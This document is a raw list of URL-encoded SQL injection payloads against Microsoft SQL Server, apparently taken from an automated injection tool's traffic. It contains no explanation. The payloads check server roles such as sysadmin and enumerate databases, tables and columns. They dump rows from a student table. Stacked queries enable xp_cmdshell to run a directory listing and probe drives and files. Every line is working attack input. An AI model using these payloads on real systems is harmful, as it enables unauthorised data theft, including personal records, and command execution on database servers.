   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%201%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%202%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%203%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%204%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%205%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%206%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%207%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%208%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%209%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2010%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2011%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2012%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2013%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1

%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2014%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2015%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2016%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2017%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2018%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2019%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1

%20;create%20table%20foofoofoo%20(a%20image);--%20and%201=1
   %20;drop%20table%20foofoofoo;create%20table%20foofoofoo([id]%20[int]%20identity%20(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
   %20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%3E0--%20and%201=1
   %20;declare%20@s%20varchar(4000)%20set%20@s=cast(0x64726f70207461626c6520666f6f666f6f666f6f3b435245415445205441424c45205b666f6f666f6f666f6f5d285b526573756c745478745d206e76617263686172283430303029204e554c4c293b62756c6b20696e73657274205b666f6f666f6f666f6f5d2066726f6d2027633a5c273b416c746572205461626c65205b666f6f666f6f666f6f5d2061646420696420696e74204e4f54204e554c4c204944454e544954592028312c31293b%20as%20varchar(4000));exec(@s)--%20and%201=1

%20;drop%20table%20foofoofoo;--%20and%201=1

%20;insert%20foofoofoo%20exec%20master.dbo.xp_availablemedia;--%20and%201=1
   %20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%201%20*%20from%20foofoofoo%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)--%20and%201=1
   %20;drop%20table%20foofoofoo;create%20table%20foofoofoo([id]%20[int]%20identity%20(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
   %20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%3E0--%20and%201=1
   %20;drop%20table%20foofoofoo;create%20table%20foofoofoo([id]%20[int]%20identity%20(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
   %20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%3E0--%20and%201=1
   %20;drop%20table%20foofoofoo;create%20table%20foofoofoo([id]%20[int]%20identity%20(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
   %20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%3E0--%20and%201=1

%20;create%20table%20[foofoofoo]([resulttxt]%20nvarchar(4000)%20null);--%20and%201=1
   %20;exec%20master.dbo.sp_addextendedproc%200x730070005f004f004100430072006500610074006500,%200x780070006c006f006700370030002e0064006c006c00--%20and%201=1
   %20;declare%20@z%20nvarchar(4000)%20set%20@z=0x640069007200200063003a005c00%20insert%20into%20[foofoofoo](resulttxt)%20exec%20master.dbo.xp_cmdshell%20@z;alter%20table%20[foofoofoo]%20add%20id%20int%20not%20null%20identity%20(1,1)--%20and%201=1

%20;drop%20table%20[foofoofoo];--%20and%201=1
   %20and%20substring(cast(serverproperty(0x700072006f006400750063007400760065007200730069006f006e00)%20as%20nvarchar(4000)),%201,%201)%3E8%20and%201=1

%20and%20user=0--

%20and%20db_name()%3E0--%20and%201=1

%20and%20@@version%3E1--%20and%201=1

%20and%20@@servername%3E0--%20and%201=1

%20and%20user%3E0--%20and%201=1
   %20and%20cast(is_member(0x640062005f006f0077006e0065007200)%20as%20nvarchar(1))%2bchar(124)=1%20and%201=1
   %20and%20cast(is_srvrolemember(0x73006500740075007000610064006d0069006e00)%20as%20nvarchar(1))%2bchar(124)=1%20and%201=1
   %20and%20cast(is_srvrolemember(0x73006500630075007200690074007900610064006d0069006e00)%20as%20nvarchar(1))%2bchar(124)=1%20and%201=1
   %20and%20cast(is_srvrolemember(0x620075006c006b00610064006d0069006e00)%20as%20nvarchar(1))%2bchar(124)=1%20and%201=1
   %20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%20from(select%20top%20%201%20dbid,name%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--%20and%201=1
   %20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%20from(select%20top%20%202%20dbid,name%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--%20and%201=1
   %20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%20from(select%20top%20%203%20dbid,name%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--%20and%201=1

%20;drop%20table%20foofoofoo;--%20and%201=1

%20;insert%20foofoofoo%20exec%20master.dbo.xp_availablemedia;--%20and%201=1

%20;drop%20table%20foofoofoo;--%20and%201=1

%20;create%20table%20foofoofoo(name%20nvarchar(255),description%20nvarchar(4000));--%20and%201=1
   %20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%201%20*%20from%20foofoofoo%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)--%20and%201=1
   %20and%20(select%20cast(count(*)%20as%20varchar(10))%2bchar(94)%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%201%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%202%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%203%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%204%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%205%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%206%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%207%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%208%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%209%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%2010%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(id%20as%20nvarchar(20))%2bchar(124)%20from%20[main]..[sysobjects]%20where%20name=0x730074007500640065006e007400)%3E0--%20and%201=1
   %20and%20(select%20cast(count(*)%20as%20varchar(10))%2bchar(94)%20from%20[main]..[syscolumns]%20where%20id=869578136)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%202%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%203%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%204%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%205%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%206%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%207%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%208%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%209%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%2010%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%2011%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20[main]..[student]%20where%201=1)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%201%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%202%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%203%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%204%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%205%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%206%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%207%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%208%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%209%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2010%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2011%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2012%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2013%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1

%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2014%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
